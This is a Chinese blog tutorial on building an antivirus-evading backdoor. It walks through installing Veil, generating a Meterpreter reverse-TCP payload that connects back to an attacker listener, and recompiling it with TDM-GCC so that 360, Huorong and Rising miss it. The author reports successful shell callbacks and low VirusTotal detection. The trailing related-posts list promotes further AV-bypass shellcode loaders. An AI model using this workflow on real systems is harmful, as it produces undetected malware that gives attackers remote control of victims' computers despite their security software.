Veil+tdm-gcc免杀360火绒瑞星
Veil-Evasion是一个用python写的免杀框架,可以将任意脚本或一段shellcode转换成Windows可执行文件,还能利用Metasploit框架生成相兼容的Payload工具,从而逃避了常见防病毒产品的检测。
0x00 Veil安装
我是直接在kail下面安装的
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
0x01 Veil使用
veil有两个免杀的工具,Evasion和Ordnance。
Ordnance可生成在Veil-Evasion中使用的shellcode,Evasion是用做文件免杀。
我们一般选择Evasion
Veil>: use Evasion
# use <id | name> 进入或使用当前可以使用的tool或者payload
列出payload
Veil/Evasion>: list
# list 列出当前可以使用的tool或者payload
选择使用 c/meterpreter/rev_tcp.py
Veil/Evasion>: use 7
#设置 需要IP和端口
[c/meterpreter/rev_tcp>>]: set lhost 192.168.190.131
[c/meterpreter/rev_tcp>>]: set lport 4444
#生产payload
[c/meterpreter/rev_tcp>>]: generate
#payload命名C01
[>] Please enter the base name for output files (default is payload): C01
源码: /var/lib/veil/output/source/C01.c
生成的exe :/var/lib/veil/output/compiled/C01.exe
0x02 Veil原生C01.exe 执行测试
说明:
192.168.190.1 安装瑞星和火绒
192.168.190.129安装360杀毒和360安全卫士
开启msf,设置好监听
在192.168.190.1上点击下载瞬间被火绒检测报毒
在192.168.190.129上点击下载并检测无异常
尝试执行
成功上线了一会后被杀,躲过了静态,没躲过动态
0x03 tdm-gcc
tdm-gcc下载地址:https://jmeubank.github.io/tdm-gcc/
TDM-GCC是一款适用于windows平台的gcc编译工具,主要适用于c语言开发者使用,软件集合了GCC 工具集中最新的稳定发行版本,包含了丰富实用的开发工具供开发者使用,安装后就可以正常使用
0x04 使用tdm-gcc编译生成 C02.exe 执行测试
/var/lib/veil/output/source/C01.c编译生成C02.exe
gcc C02.c -o C02.exe -lwsock32
在 192.168.190.129上执行
执行C02.exe成功上线
将C02.exe复制到192.168.190.1
瑞星和火绒均未检测出风险
执行
成功上线
virustotal.com中6/67个报毒
综上所诉,Veil+tdm-gcc达到的免杀效果还是不错的
仅用于学习交流,不得用于非法用途
如侵权请私聊博主删文
Veil+tdm-gcc免杀360火绒瑞星相关推荐
- 【工具分享】免杀360火绒的shellcode加载器
微信公众号:乌鸦安全 扫取二维码获取更多信息! 1. 免杀效果 该shellcode加载器目前可以过360&火绒,Windows Defender没戏... 代码和思路暂不开源! 你可以在我的 ...
- 红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?
文章来源|MS08067 红队培训班第12节课作业 本文作者:某学员A(红队培训班1期学员) 按老师要求尝试完成布置的作业如下: 一.远程线程注入 (一)通过MSF生成payload 通过msfven ...
- 免杀Bypass!可过WDF/360/火绒的C#混淆器
0x01 工具简介 这次分享的是一个可用于免杀过WDF/360/火绒的C#混淆器,但只能混淆.Net Framework应用程序.作者写这个工具主要是为了了解更多关于 C# 和混淆器的工作原理. 关注 ...
- 利用nps_payload 免杀360,腾讯电脑管家
利用nps_payload 免杀360,腾讯电脑管家 一.nps_payload介绍 nps_payload是2017年开源的工具,安装使用都比较简单,nps_payload可以生成基于msbuild ...
- 2023最新使用python进行shellcode免杀过360火绒 ,反虚拟机
本源码仅供学习交流,不得用于违法范围,本源码已放到QQ交流群 群文件中QQ群:798134185 反虚拟机方案根据虚拟机系统文件 cpu核心数 开机启动时间 c盘大小判断 生成c语言的payloa ...
- ShellCode_Loader - MsfCobaltStrike免杀ShellCode加载器加密工具
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具 文章目录 ShellCode_Loader - Msf&Cobal ...
- 红队培训班作业 | 免杀过360和火绒 四种方法大对比
文章来源|MS08067 红队培训班第12节课作业 本文作者:汤浩荡(红队培训班1期学员) 按老师要求尝试完成布置的作业如下: 环境准备: Kali linux安装cs4.2,Windows7系统安装 ...
- MSF外网渗透+shellcode免杀
1. 内网穿透 使用的Sunny-Ngrok服务 .你在Sunny-Ngrok官网注册好后获得一条免费或付费的隧道,添加tcp通道,端口号自定. 官网链接:https://www.ngrok.cc/( ...
- 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp3 免杀原理与实践
2019-2020-2 20175227张雪莹<网络对抗技术> Exp3 免杀原理与实践 目录 0. 基础知识 1. 实验内容 1.1 方法 1.1.1 正确使用msf编码器 1.1.2 ...
最新文章
- SpringBoot2.x教程--整合使用jOOQ面向对象查询
- C++ static的作用
- 实验干货分享:用Go语言实现分布式缓存开发之map
- c#10中的namespace
- JQuery AJAX请求结果的null为key时无法进入success方法
- Duilib嵌入CEF以及JavaScript与C++交互
- python创建sqlite3 unicode error_python/sqlite3:发生异常:sqlite3.operationalerror
- c#中,如何获取日期型字段里的年、月、日?
- 计算机安装pdf打印机驱动,Win7安装Microsoft Print to PDF虚拟打印机的方法
- 四种JAVA架构演进史,程序员能学会最后一种就非常厉害了,至少50k
- 什么是Java分布式?
- 计算机无法添加用户名或密码错误,win10系统无法登录网络打印机提示未知的用户名或者密码错误的设置技巧...
- 【笔记】第2章 向量
- php insertrow,table insertRow、deleteRow定义和用法总结_javascript技巧
- 理性、抽丝剥茧地解决 Easypoi、poi 版本冲突问题,而不是无头苍蝇一样闷头百度、google 一顿搜
- Java项目——云R记
- AIRCHECK G2 v5 新版本-AirMapper APP发布
- 电影 控方证人 + 勇敢者游戏
- 第一台生物计算机,我国研制成功第一台生物计算机
- 注册码 文件内容 CS1.6 中英文 CD KEY注册文件内容